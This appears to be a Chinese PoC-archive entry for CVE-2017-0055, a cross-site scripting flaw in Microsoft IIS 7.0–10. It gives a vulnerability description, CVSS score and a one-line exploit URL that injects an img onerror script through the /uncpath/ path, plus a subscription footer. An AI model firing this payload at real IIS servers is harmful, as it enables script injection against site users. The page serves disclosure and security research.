CVE-2017-0055 PoC — Microsoft Windows Internet Information Server 跨站脚本漏洞
关联漏洞
标题:
Microsoft Windows Internet Information Server 跨站脚本漏洞
(CVE-2017-0055)
Description:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。IIS Server是其中的一个运行于其中的互联网基本服务。 Microsoft Windows中的IIS Server存在跨站脚本漏洞。远程攻击者可利用该漏洞读取未授权的内容、以用户身份执行操作,以及在浏览器中注入恶意内容。以下版本受到影响:Windows Vista SP2,Windows Server 2008 SP2和R2,Windows 7 SP1,Windows 8.1,Windows Server 2
Description
This it's a PoC of Departament of justice VDP. By rootkit
介绍
# CVE-2017-0055 PoC
MICROSOFT IIS 7.0/7.5/8.0/8.5/10 /UNCPATH/ CROSS SITE SCRIPTING
Reference: https://nvd.nist.gov/vuln/detail/CVE-2017-0055
Base Score: 6.1
Severity: Medium
## Exploit:
http://vulniis/uncpath/%3Cimg%20onerror=alert('xss')%20src=/%3E:/
文件快照
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →